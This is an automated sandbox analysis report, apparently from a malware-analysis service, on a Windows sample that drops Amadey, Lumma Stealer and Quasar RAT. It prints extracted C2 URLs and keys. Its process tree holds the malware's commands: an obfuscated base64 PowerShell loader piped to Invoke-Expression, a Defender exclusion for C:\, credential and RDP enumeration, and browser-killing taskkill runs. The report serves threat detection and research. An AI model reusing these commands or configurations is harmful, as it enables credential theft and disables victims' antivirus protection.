Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
-
submitted
02/04/2025, 07:13
General
-
Target
05a8bd18b20583ce095da016e49d1c7d.exe
-
Size
1.8MB
-
MD5
05a8bd18b20583ce095da016e49d1c7d
-
SHA1
fd3e9a2cf5032216b6f3c7a14448fc98166e655d
-
SHA256
62c8b44ed8393bda54d0779ed9f2dc0702f6f7362eab767bc8f5802514441d66
-
SHA512
25ad1a89741bb6237ab346917572c214bd8343cb0f3e95fcd73dec62090dbe5cb5a3d4c76c68d1c85dfa7af68b7e8a2b7f6947c269699f24d29a78833df2da24
-
SSDEEP
49152:3ath5aXwCteEDyrWxo5QlikjJRT79Zxiw:3atXaXwSj/gQMIHxiw
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://starcloc.bet/GOksAo
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://hadvennture.top/GKsiio
https://1ironloxp.live/aksdd
https://vspacedbv.world/EKdlsk
https://wstarcloc.bet/GOksAo
https://atargett.top/dsANGt
https://ostarcloc.bet/GOksAo
https://wgalxnetb.today/GsuIAo
https://hcosmosyf.top/GOsznj
https://hywnnavstarx.shop/FoaJSi
https://dmetalsyo.digital/opsa
https://-targett.top/dsANGt
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
-
encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Modded Client Startup
-
subdirectory
SubDir
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
-
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
-
Gcleaner family
-
Healer
Healer an antivirus disabler dropper.
-
Healer family
-
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
-
Lumma family
-
Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
-
Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
-
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
-
Modifies security service 2 TTPs 2 IoCs
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
-
Blocklisted process makes network request 5 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs
Using powershell.exe command.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 23 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Possible privilege escalation attempt 2 IoCs
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 14 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
-
Checks BIOS information in registry 2 TTPs 26 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Deletes itself 1 IoCs
-
Drops startup file 4 IoCs
-
Executes dropped EXE 38 IoCs
-
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 11 IoCs
-
Modifies file permissions 1 TTPs 2 IoCs
-
Reads ssh keys stored on the system 2 TTPs
Tries to access SSH used by SSH programs.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
Enumerates processes with tasklist 1 TTPs 42 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
-
Suspicious use of SetThreadContext 12 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 15 IoCs
-
Hide Artifacts: Ignore Process Interrupts 1 TTPs 3 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
-
Launches sc.exe 39 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Program crash 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 61 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 30 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 12 IoCs
-
Kills process with taskkill 64 IoCs
-
Modifies data under HKEY_USERS 4 IoCs
-
Modifies registry class 7 IoCs
-
NTFS ADS 2 IoCs
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 4 IoCs
-
Suspicious behavior: MapViewOfSection 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 36 IoCs
-
Suspicious use of SendNotifyMessage 26 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\05a8bd18b20583ce095da016e49d1c7d.exe"C:\Users\Admin\AppData\Local\Temp\05a8bd18b20583ce095da016e49d1c7d.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe"C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"3⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_3703418885.txt\""4⤵
- NTFS ADS
-
-
C:\Windows\system32\net.exe"net" statistics workstation4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 statistics workstation5⤵
-
-
-
C:\Windows\system32\vaultcmd.exe"vaultcmd" /list4⤵
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FO CSV /NH4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list4⤵
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmdkey.exe"C:\Windows\system32\cmdkey.exe" /list5⤵
-
-
-
C:\Windows\system32\certutil.exe"certutil" -store My4⤵
-
-
C:\Windows\system32\certutil.exe"certutil" -store -user My4⤵
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-VpnConnection | ConvertTo-Json"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "4⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list4⤵
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list:TERMSRV/69.48.201.744⤵
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM chrome.exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM msedge.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM brave.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM opera.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM vivaldi.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM firefox.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM dragon.exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\tasklist.exe"tasklist"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM maxthon.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM uc_browser.exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM Discord.exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM slimjet.exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordCanary.exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM cent_browser.exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordPTB.exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM epic.exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordDevelopment.exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM torch.exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM whale.exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM 360browser.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
